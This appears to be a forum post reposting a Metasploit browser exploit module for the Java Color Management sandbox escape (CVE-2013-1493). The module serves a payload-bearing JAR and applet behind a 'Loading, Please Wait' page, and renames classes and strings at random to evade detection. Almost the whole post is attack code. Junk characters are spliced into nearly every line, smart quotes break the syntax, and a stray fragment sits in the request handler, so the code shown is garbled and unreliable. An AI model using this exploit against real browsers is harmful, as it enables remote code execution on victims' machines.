##
( T7 w. x4 S1 c, C. k0 g) x3 M5 m
( o% r3 X W5 q; X* d# This file is part of the Metasploit Framework and may be subject to) a& B" U( i& [3 Y5 L
# redistribution and commercial restrictions. Please see the Metasploit( e O, k. k: D( r+ f4 T
# web site for more information on licensing and terms of use.! l! o/ J; g _7 p$ ~- z
# http://metasploit.com/. e1 A! H7 B! q# H
##* V& _3 p9 Y. ~/ D
require ‘msf/core’0 k( P7 C7 c6 { [7 j
require ‘rex’' R) N* U( p7 Z- l
class Metasploit3 < Msf::Exploit::Remote% v8 A" r& ~9 `
Rank = NormalRanking- U( j2 Z: t ]4 h& }+ \
include Msf::Exploit::Remote::HttpServer::HTML6 e h: `' t' \& P
include Msf::Exploit::EXE
8 P* `6 R2 \8 y) L$ rinclude Msf::Exploit::Remote::BrowserAutopwn0 O9 Z2 r4 e0 y8 E: `% z
autopwn_info({ :javascript => false }); c: M `* ], M2 ?1 ]: O# K6 K
def initialize( info = {} )
) B: \8 x( A0 i" M' ssuper( update_info( info,5 e& b; u4 y5 ?
‘Name’ => ‘Java CMM Remote Code Execution’,
# D" I( }2 F1 U9 J4 G( D‘Description’ => %q{
' {/ f3 U6 ?: ?4 OThis module abuses the Color Management classes from a Java Applet to run
! z- p" @: t, i: w1 Varbitrary Java code outside of the sandbox as exploited in the wild in February" U ]+ }7 X$ M
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u418 e* W7 J) l1 l# g
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
( ^) G. a9 c: C! C$ Wsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
- g% Y S2 \0 Mwarning in order to run the malicious applet.
& C& b$ H7 W& V}, W9 c. D& O- n
‘License’ => MSF_LICENSE,
9 J- S/ A( n8 Q! j& F/ B‘Author’ =>6 j! Y9 r" }" m2 U4 C: J) H
'Unknown', # Vulnerability discovery and Exploit
0 X* a' Y' M, v, H. B, B* a9 A'juan vazquez' # Metasploit module (just ported the published exploit)
^. \* e$ C. p2 t* t],4 l1 W- U2 m8 _+ E8 N# _' k
‘References’ =>$ Y o$ L$ \6 O3 S6 u- @( f& _6 L0 }
[6 J4 Q9 \% C, ]) ]7 j
[ 'CVE', '2013-1493' ],
5 S- V# v- n8 g5 K& z0 H[ 'OSVDB', '90737' ],( [+ E: ~& e2 S, c+ p
[ 'BID', '58238' ],
, w4 }# h- f% h[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
+ y. g6 N4 ~# i' w& l[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
1 U6 {' r: t+ }[ 'URL', 'http://pastie.org/pastes/6581034' ]
6 `% x6 q i- k( O],+ U1 F* k$ R9 X7 J0 P6 m
‘Platform’ => [ 'win', 'java' ],) ?) A. S$ }3 a4 h( ^9 {! I6 s) F
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
7 X5 t8 t$ ^# v8 A‘Targets’ =>
]* O& D0 L; o* `[/ t. _0 h# L0 i$ z
[ 'Generic (Java Payload)',: X z+ P" K- Q2 ]
{5 U% f$ r; p* Y
'Platform' => 'java',; f9 E0 _, p- o
'Arch' => ARCH_JAVA
% `7 N- h6 e3 {7 w1 q}
- f* F5 l4 {: V, S. g( }],
1 F1 _- R* ]% M, j' W2 f[ 'Windows x86 (Native Payload)',- m, z' P% }: j! `
{0 ]( M9 t. Z( d" _
'Platform' => 'win',+ H! T3 A8 X5 O) z8 G: _
'Arch' => ARCH_X86
9 z) Q O: h, p5 B* p5 k}
, C; Z8 n5 M& j2 M]
7 _2 m% J4 z3 @8 C0 L! C, v],
2 Y+ w1 G! X- `2 R: s" M. m2 d‘‘DisclosureDate’ => ‘Mar 01 2013′
& p- j9 M- _8 z8 t% t! \7 X))
9 H8 }$ I, N5 ]8 o. g: O9 N# Hend
V8 e$ G' L6 V9 E3 K5 p- vdef setup4 r' V' K7 G1 w8 i) x }' K
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
0 h7 z0 k5 S. a@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 x7 N" x- A6 R1 O
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)) E) L8 U. x/ x& x2 [6 P" j7 I
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! l7 z7 J8 I1 B* _
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)8 ]7 u8 |* u: [ d2 {# |! O
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) ~* t" i3 x5 m* A" y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)2 l4 d5 M) A9 B9 W7 a
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" J2 Z; ~. |7 N1 y6 b# @ ~$ r
@init_class_name = rand_text_alpha(“Init”.length)* x! o; E9 v* j8 w; z
@init_class.gsub!(“Init”, @init_class_name)$ ?& O8 p, j5 h' X: h
super! C) [( l9 q2 k( n
end
8 C! N! e- F% ]7 X2 wdef on_request_uri(cli, request)( L; r" m. A* ^" C& G9 {
print_status(“handling request for #{request.uri}”)
% h# M" F: k9 C8 u! }+ V6 [8 ^case request.uri
% X( c* b5 m5 R" j7 gwhen /\.jar$/i
' q8 z0 j/ Q5 U7 K. r ?" H, ^9 Xjar = payload.encoded_jar8 U7 _" d& Q1 N8 L+ B
jar.add_file(“#{@init_class_name}.class”, @init_class)7 I4 L* O( T- Q0 v7 l: ?8 p$ |
jar.add_file(“Leak.class”, @leak_class)0 }8 T% L5 E2 b6 Q
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)# U& A" Q7 N( F: V
jar.add_file(“MyColorSpace.class”, @color_space_class)2 s4 A: P: u8 @" k% J# Y
DefaultTarget’ => 1,1 v/ K$ S0 B1 q
metasploit_str = rand_text_alpha(“metasploit”.length)
+ i' p4 M* X, J+ b e7 ]payload_str = rand_text_alpha(“payload”.length)/ Y. S' D2 R' ?1 Z- W; L5 w& p1 g
jar.entries.each { |entry|
% k) B# f W0 ?. [2 dentry.name.gsub!(“metasploit”, metasploit_str)$ g$ \# F. J" J% y" L& P
entry.name.gsub!(“Payload”, payload_str)
% ? \; t7 V1 u6 D. uentry.data = entry.data.gsub(“metasploit”, metasploit_str)
0 H7 Z' U; O: s0 b: [entry.data = entry.data.gsub(“Payload”, payload_str)
8 i+ l8 v8 w% Q0 Z& t/ p}2 x- e6 F+ j2 c- @
jar.build_manifest9 p9 q/ ?* s+ I7 H0 s
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })$ C9 s, L. Y3 C& D, e
when /\/$/7 `" B) ~6 n/ }; K- Y6 R" s& P7 U
payload = regenerate_payload(cli); b9 W2 P2 W& w7 k6 X) c
if not payload
+ t% d5 l: Z8 z" s, t, X0 Lprint_error(“Failed to generate the payload.”)+ F7 C4 t' s/ ^& g0 d7 u: V
send_not_found(cli) W9 c5 V) ?% e% B( Z) P: ]: y6 J" ~
return' T9 y( g- r, L$ f5 _" q. o
end, d/ ^! p$ C' X$ v5 t
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ }): J4 t; b5 L9 `' f# P+ g4 ~
else
* x% a4 O* W" k5 {% `send_redirect(cli, get_resource() + ‘/’, ”)2 I) R9 N% K: B) q3 }
end6 Z7 m# X( p) A, n
end& M9 |* Y0 g+ m' K
def generate_html
/ T9 m% M) h4 Dhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|5 h0 c% t# @7 Y* K: W- Z7 e
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
5 R9 n2 q' F$ c3 Ghtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
0 l% |' s0 C/ n) C0 khtml += %Q|</applet></body></html>|
; ~! W: o; b, v- `. hreturn html
) v; {! G1 b, T/ s: W7 b1 Oend
0 Q7 }& B& U* T2 N) o* _/ w" Gend
2 v" O+ W8 g, Y* L0 b/ U T1 S6 I. g1 q Oend6 r1 G% S/ y+ }
|
发表于 2013-4-4 17:31:17
收藏
支持
反对